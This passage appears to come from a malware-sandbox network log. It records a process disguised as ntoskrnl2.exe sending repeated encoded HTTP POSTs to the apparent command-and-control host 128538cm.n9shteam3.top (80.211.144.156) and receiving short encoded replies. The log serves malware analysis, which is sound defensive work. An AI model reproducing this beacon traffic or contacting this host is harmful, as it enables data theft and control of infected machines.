                                                            Sep 2, 2024 13:33:58.239264965 CEST1028OUTData Raw: 50 54 5f 54 5b 43 5c 53 5b 5f 56 5a 57 5b 50 59 55 5c 5e 46 50 59 5a 5b 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PT_T[C\S[_VZW[PYU\^FPYZ[YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$0<_015^':?-4 X$9V?80Q)$ [>16.*%^./]+0
                                                            Sep 2, 2024 13:33:58.573275089 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:58.706664085 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:57 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.2.64976280.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:33:58.918984890 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1024
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:59.282171011 CEST1024OUTData Raw: 55 56 5a 5e 5e 46 59 50 5b 5f 56 5a 57 5d 50 53 55 5e 5e 41 50 52 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UVZ^^FYP[_VZW]PSU^^APRZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\''21?+7\3:%.]>.(_8$35V*;$T)B(Z*25.*%^./]+
                                                            Sep 2, 2024 13:33:59.592603922 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:59.724842072 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:58 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            20192.168.2.64976380.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:33:59.672164917 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:00.300123930 CEST1340OUTData Raw: 55 56 5a 52 5b 43 59 55 5b 5f 56 5a 57 5e 50 53 55 5b 5e 43 50 5b 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UVZR[CYU[_VZW^PSU[^CP[Z^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\''2!^?(#Y316'"<.<Z-4'%++'>B'?!.%^./]+$
                                                            Sep 2, 2024 13:34:00.319933891 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:00.938582897 CEST308INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:00 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 23 0e 34 24 02 09 25 15 30 5e 2a 07 36 5a 28 2e 3f 18 2d 11 2c 5b 24 2a 2f 58 28 54 2e 09 31 3a 2a 04 3d 5a 2d 59 3f 22 29 11 35 0e 20 5b 03 1f 25 17 22 22 36 1d 25 16 00 03 27 19 26 5c 20 34 20 5f 29 13 2a 1a 25 2d 33 03 23 08 2d 08 3b 04 39 09 31 16 2f 00 2f 2f 2d 06 31 2e 2a 56 08 16 3b 0f 3c 3c 36 5c 34 09 23 5b 23 5e 29 53 34 26 09 14 25 23 2c 0a 30 3a 21 1c 33 07 38 0d 28 3e 2b 1b 33 00 31 5b 37 30 25 19 2e 13 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: #4$%0^*6Z(.?-,[$*/X(T.1:*=Z-Y?")5 [%""6%'&\ 4 _)*%-3#-;91///-1.*V;<<6\4#[#^)S4&%#,0:!38(>+31[70%.$P.-V0WS


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            21192.168.2.64976480.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:00.664923906 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:01.009216070 CEST1028OUTData Raw: 55 55 5a 52 5e 47 59 5c 5b 5f 56 5a 57 59 50 5b 55 5c 5e 42 50 5a 5a 51 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UUZR^GY\[_VZWYP[U\^BPZZQYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'['%<($%"!%>5?>7,4X0<9U(^/*'>2*X:%^./]+8
                                                            Sep 2, 2024 13:34:01.319756985 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:01.447962999 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:00 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            22192.168.2.64976580.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:01.578176022 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:01.931812048 CEST1028OUTData Raw: 55 52 5a 5f 5e 43 5c 57 5b 5f 56 5a 57 5a 50 52 55 5e 5e 41 50 5d 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: URZ_^C\W[_VZWZPRU^^AP]Z^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'X&!%]<;7%"*3=)?[8;;0?6?((T=8)*:%^./]+
                                                            Sep 2, 2024 13:34:02.252561092 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:02.384099960 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:01 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            23192.168.2.64976680.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:02.519371986 CEST346OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:34:02.886218071 CEST1028OUTData Raw: 50 53 5f 52 5e 46 59 52 5b 5f 56 5a 57 5c 50 52 55 50 5e 48 50 52 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PS_R^FYR[_VZW\PRUP^HPRZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Z01!]+8'^32![0-9+.78 [&<5+<*$0=!=-:%^./]+,
                                                            Sep 2, 2024 13:34:03.164361000 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:03.369221926 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:02 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            24192.168.2.64976880.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:04.164904118 CEST346OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:34:04.509399891 CEST1028OUTData Raw: 50 55 5a 57 5b 42 59 50 5b 5f 56 5a 57 5f 50 5c 55 5d 5e 47 50 5b 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PUZW[BYP[_VZW_P\U]^GP[ZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Y3">+($[%>2?8;73.+;/>(^>!\-:%^./]+
                                                            Sep 2, 2024 13:34:04.831409931 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:05.045439959 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:04 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            25192.168.2.64976980.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:05.175544024 CEST346OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:34:05.525038958 CEST1028OUTData Raw: 55 52 5f 52 5b 46 59 5d 5b 5f 56 5a 57 54 50 5a 55 5f 5e 49 50 5e 5a 5d 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UR_R[FY][_VZWTPZU_^IP^Z]YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'X&!9_<')_0=2]+8($,&?(W* _?">9:%^./]+
                                                            Sep 2, 2024 13:34:05.827228069 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:05.953397989 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:05 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            26192.168.2.64977080.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:06.517075062 CEST346OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:34:06.868585110 CEST1340OUTData Raw: 50 56 5a 50 5e 42 5c 56 5b 5f 56 5a 57 5f 50 5e 55 5d 5e 48 50 5e 5a 50 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PVZP^B\V[_VZW_P^U]^HP^ZPYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'$2+''!%^'=&^<-([-$[&?&+/=4>!&Y9%^./]+
                                                            Sep 2, 2024 13:34:07.171248913 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:07.389738083 CEST308INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:06 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 23 0a 23 1d 3b 1d 26 2b 2c 5a 2b 2a 29 02 3f 3d 24 41 2d 3c 38 58 33 07 20 02 28 0c 32 0e 26 29 0f 58 29 2c 35 11 3e 32 25 54 21 24 20 5b 03 1f 25 5e 22 22 3a 54 26 06 32 00 33 19 2d 01 36 19 3c 17 28 3d 2d 0b 33 04 34 12 20 1f 07 08 3b 5b 25 0e 31 38 2b 02 2f 3c 35 05 32 14 2a 56 08 16 38 13 2b 2c 2e 5c 22 27 2f 5d 21 28 2e 0e 21 36 05 57 24 33 2b 11 27 2a 26 0f 27 07 24 09 29 3d 3f 58 30 00 3d 5c 20 1d 21 54 39 29 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: ##;&+,Z+*)?=$A-<8X3 (2&)X),5>2%T!$ [%^"":T&23-6<(=-34 ;[%18+/<52*V8+,.\"'/]!(.!6W$3+'*&'$)=?X0=\ !T9)$P.-V0WS


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            27192.168.2.64977180.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:06.575123072 CEST346OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:34:06.931066036 CEST1028OUTData Raw: 55 57 5a 57 5e 41 5c 54 5b 5f 56 5a 57 54 50 58 55 58 5e 40 50 5b 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UWZW^A\T[_VZWTPXUX^@P[Z^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'3"-^?^?^323X2^(4_8$<'<-(8P)$3)1._:*%^./]+
                                                            Sep 2, 2024 13:34:07.213680983 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:07.337285995 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:06 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            28192.168.2.64977380.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:07.581300974 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:34:07.931277990 CEST1028OUTData Raw: 55 5e 5a 53 5b 43 5c 57 5b 5f 56 5a 57 5e 50 5f 55 5c 5e 49 50 5b 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U^ZS[C\W[_VZW^P_U\^IP[Z^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Y$1<7\$9'=1+.7-$33/%W? )'8X=W9.*%^./]+$
                                                            Sep 2, 2024 13:34:08.233108997 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:08.361296892 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:07 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            29192.168.2.64977480.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:08.521495104 CEST346OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:34:08.872854948 CEST1028OUTData Raw: 50 56 5f 56 5b 41 5c 57 5b 5f 56 5a 57 5a 50 5b 55 51 5e 40 50 5c 5a 5d 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PV_V[A\W[_VZWZP[UQ^@P\Z]YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$01-Y+^#\0")Z$%?;0X$?%T?(V)$?)1=-:%^./]+
                                                            Sep 2, 2024 13:34:09.163899899 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:09.292871952 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:08 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            30192.168.2.64977680.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:09.742089987 CEST346OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:34:10.087376118 CEST1028OUTData Raw: 55 52 5a 52 5e 45 59 57 5b 5f 56 5a 57 55 50 53 55 5f 5e 46 50 53 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: URZR^EYW[_VZWUPSU_^FPSZ^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'Y'><_'%^3>2]?-848'*(^<U('')2)/:%^./]+
                                                            Sep 2, 2024 13:34:10.383903027 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:10.508687973 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:09 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            31192.168.2.64977780.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:34:11.510080099 CEST346OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Sep 2, 2024 13:34:11.869126081 CEST1028OUTData Raw: 50 55 5f 51 5b 41 5c 51 5b 5f 56 5a 57 5c 50 52 55 5d 5e 42 50 53 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PU_Q[A\Q[_VZW\PRU]^BPSZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'X02<<$!>3>*X+$_;B'$Z"*(Q*'8Z=>_.:%^./]+,
                                                            Sep 2, 2024 13:34:12.163619041 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:34:12.290849924 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:34:11 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            32192.168.2.64977880.211.144.156807552C:\Windows\System32\ntoskrnl2.exe
                                                            TimestampBytes transferredDirectionData
